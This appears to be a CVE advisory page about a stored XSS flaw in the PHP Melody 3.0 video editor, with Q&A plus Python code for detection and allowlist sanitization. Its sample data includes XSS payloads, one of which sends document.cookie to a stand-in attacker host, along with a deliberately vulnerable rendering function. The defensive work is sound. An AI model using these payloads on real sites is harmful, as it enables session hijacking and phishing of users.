CVE-2021-47913
Persistent XSS in PHP Melody 3.0 Video Editor Enables Session Hijacking
Publication date: 2026-02-01
Last updated on: 2026-02-11
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| phpsugar | php_melody | 3.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided resources do not explicitly discuss the impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA. However, since the vulnerability allows persistent cross-site scripting leading to session hijacking and unauthorized application manipulation, it could potentially result in unauthorized access to sensitive user data, which may affect compliance with data protection regulations. Proper mitigation and patching are necessary to maintain compliance. [1, 2]
Can you explain this vulnerability to me?
CVE-2021-47913 is a persistent (stored) cross-site scripting (XSS) vulnerability in PHP Melody version 3.0, specifically in the TinyMCE WYSIWYG editor that the video editor uses for the episode description. A privileged user, such as an editor or moderator, can place script or other active markup in the episode description through the video editor interface. The markup is stored with the episode and executes in the browser of every user who views the affected content, which lets the attacker hijack those users' sessions and manipulate the application on their behalf. [1, 2]
How can this vulnerability impact me?
This vulnerability can lead to session hijacking, persistent phishing attacks, unauthorized external redirects, and manipulation of application modules. Attackers with editor-level privileges can inject malicious scripts that execute persistently, potentially compromising user sessions and allowing unauthorized control or manipulation of the application. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The injected markup is submitted through the video editor form to `edit-episode.php` in the `description` parameter and is then stored with the episode; the `episode_id` parameter in the GET request that opens the editor only selects the episode being edited, so a GET with `episode_id` is by itself not evidence of exploitation. Detection therefore has two parts. First, inspect requests to `edit-episode.php` whose `description` value contains script tags, event-handler attributes (`onerror=`, `onclick=`), `javascript:` URIs or iframe elements. A web application firewall or reverse proxy that logs request bodies is the practical source for this, because a standard web-server access log does not record form bodies, and a packet capture cannot read traffic to a site served over TLS. Where the application is served over plain HTTP, a capture such as the following shows requests to the affected endpoint (the BPF expression selects only TCP segments that carry a payload): `tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep 'edit-episode.php'`. Second, and more reliably, scan the stored `description` fields in the database for script tags, iframe elements, event-handler attributes and `javascript:` URIs: a payload that was stored before monitoring began is visible only there. [2]
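The two detection steps above, as an added example (not code from the original page or from PHP Melody): a scanner that flags dangerous markup in exported `description` rows and summarises access-log entries for `edit-episode.php`. The log lines, the description rows and the indicator list are constructed for this example; the log format assumed is Apache combined format, and the endpoint path is taken from the advisory text. The example deliberately shows that the GET opening the editor is reported as context only, while a crafted query string and the stored descriptions are what actually trigger indicators.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Markup patterns that have no business in an episode description. Constructed
# for this example; extend the list for markup your deployment never allows.
INDICATORS = {
    "script tag": re.compile(r"<\s*script\b", re.I),
    "framed content": re.compile(r"<\s*(iframe|frame|object|embed)\b", re.I),
    "event handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript: URI": re.compile(r"javascript\s*:", re.I),
    "srcdoc attribute": re.compile(r"\bsrcdoc\s*=", re.I),
}

# Apache combined-format line: method, request target and status are all we need.
LOG_RX = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_description(text):
    """Return the names of every indicator that fires on one piece of HTML."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_access_log(log_text):
    """Summarise every request to edit-episode.php seen in an access log.

    The GET that opens the editor only carries episode_id, so it is context, not
    evidence; its query string is still decoded (twice, to catch double encoding)
    and scanned in case a crafted URL carried markup. The POST that saves the form
    is the event that can store the payload, but the access log never records the
    POST body, so those entries must be correlated with the database scan below.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RX.search(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/edit-episode.php"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)   # decodes once
        hits = set()
        for values in params.values():
            for v in values:
                hits.update(scan_description(v))
                hits.update(scan_description(unquote_plus(v)))   # second decode
        findings.append({
            "method": m["method"],
            "status": m["status"],
            "episode_id": params.get("episode_id", [None])[0],
            "query_indicators": sorted(hits),
        })
    return findings


def scan_descriptions(rows):
    """Scan (episode_id, description) rows exported from the database; return only hits."""
    results = []
    for episode_id, html in rows:
        hits = scan_description(html)
        if hits:
            results.append((episode_id, hits))
    return results


# --- Constructed sample data (not from the original page or any real deployment) ---
ACCESS_LOG = """\
203.0.113.7 - editor [01/Feb/2026:10:00:01 +0000] "GET /edit-episode.php?episode_id=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - editor [01/Feb/2026:10:00:19 +0000] "POST /edit-episode.php?episode_id=42 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Feb/2026:10:05:00 +0000] "GET /edit-episode.php?episode_id=42%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - editor [01/Feb/2026:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

DESCRIPTION_ROWS = [
    (41, "<p>Season finale, <b>two hours</b>.</p>"),
    (42, '<p>Recap</p><script>fetch("https://attacker.example/?c=" + document.cookie)</script>'),
    (43, '<img src="x" onerror="alert(document.domain)">'),
    (44, '<a href="javascript:void(0)" onclick="location=\'https://phish.example\'">watch</a>'),
    (45, '<iframe src="https://phish.example/login"></iframe>'),
]

if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_LOG):
        print(finding)
    for episode_id, hits in scan_descriptions(DESCRIPTION_ROWS):
        print(f"episode {episode_id}: {', '.join(hits)}")
```

Run against a real deployment, replace `DESCRIPTION_ROWS` with the output of a `SELECT` over the episode table and `ACCESS_LOG` with the web server's log; the POST entries the log scan reports are the submissions to cross-check against the database hits by `episode_id` and timestamp.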
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include applying the vendor-provided patch, released by September 22, 2021, which encodes and sanitizes the input accepted from the TinyMCE editor, in particular the `description` parameter. Until the patch is applied, restrict access to the video editor module to trusted personnel, audit editor activity and review existing episode descriptions for injected markup, and add server-side neutralisation of the `description` field. Because the field is intentionally HTML, that means an allowlist sanitizer (permitted tags and attributes only, no event-handler attributes, only `http`/`https` URLs in `href` and `src`) rather than blanket output encoding, which would also destroy legitimate formatting. Two defence-in-depth measures limit the damage of a payload that does get stored: mark the session cookie `HttpOnly`, so injected script cannot read it through `document.cookie` (the script can still issue requests inside the victim's session, so this is no substitute for the fix), and serve a Content-Security-Policy that disallows inline script. A web application firewall with rules that block script payloads aimed at the video editor reduces, but does not eliminate, exploitation risk. [2]
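The allowlist neutralisation described above, as an added example that is not PHP Melody's code and not the vendor's actual patch: a small sanitizer built on Python's `html.parser` that rebuilds a WYSIWYG description from permitted tags and attributes, drops script-bearing elements together with their content, strips event-handler attributes, and rejects `href`/`src` values whose scheme is not `http`, `https` or relative. The allowed-tag policy, the `render_vulnerable`/`render_hardened` pair and the sample payloads are assumptions made for this example; `render_vulnerable` only illustrates the echo-unchanged pattern the advisory describes.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist for an episode description: enough for formatting and links, nothing
# that can run script. Assumed policy for this example, not PHP Melody's own.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", ""}           # "" covers relative URLs
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}


class DescriptionSanitizer(HTMLParser):
    """Rebuild the description from the allowlist; everything else is dropped or escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # output fragments
        self.open_tags = []    # allowed tags currently open, for well-formed closing
        self.skip_depth = 0    # >0 while inside an element whose content is discarded

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                              # unknown tag dropped, its text kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                        # drops onerror=, onclick=, style=, srcdoc=, ...
            value = (value or "").strip()
            if name in URL_ATTRS and urlsplit(value).scheme.lower() not in SAFE_SCHEMES:
                continue                        # drops javascript:, data:, vbscript: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # Close every tag opened after it as well, so the output nests correctly.
            while self.open_tags:
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:                 # text is always re-escaped
            self.out.append(escape(data, quote=False))

    # Comments, doctypes and processing instructions fall through to the base
    # class handlers, which discard them.

    def result(self):
        while self.open_tags:                   # close anything the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_description(html):
    """Neutralise a WYSIWYG description while keeping its allowed formatting."""
    parser = DescriptionSanitizer()
    parser.feed(html)
    parser.close()
    return parser.result()


def render_vulnerable(description):
    """The pattern the advisory describes: editor HTML stored and echoed unchanged."""
    return f'<div class="episode-description">{description}</div>'


def render_hardened(description):
    """Sanitize on the way in, and again on the way out so rows stored earlier are covered."""
    return f'<div class="episode-description">{sanitize_description(description)}</div>'


# Constructed sample payloads (not from the original page).
SAMPLES = [
    '<p>Season finale, <b>two hours</b>.</p>',
    '<p>Recap</p><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    '<img src="x" onerror="alert(document.domain)">',
    '<a href="javascript:void(0)" onclick="location=\'https://phish.example\'">watch</a>',
    '<iframe src="https://phish.example/login"></iframe>after',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(render_vulnerable(sample))
        print(render_hardened(sample))
```

Applying the sanitizer on output as well as on input is what makes it useful during incident response: descriptions stored before the fix are neutralised the next time they are rendered, without waiting for a database clean-up.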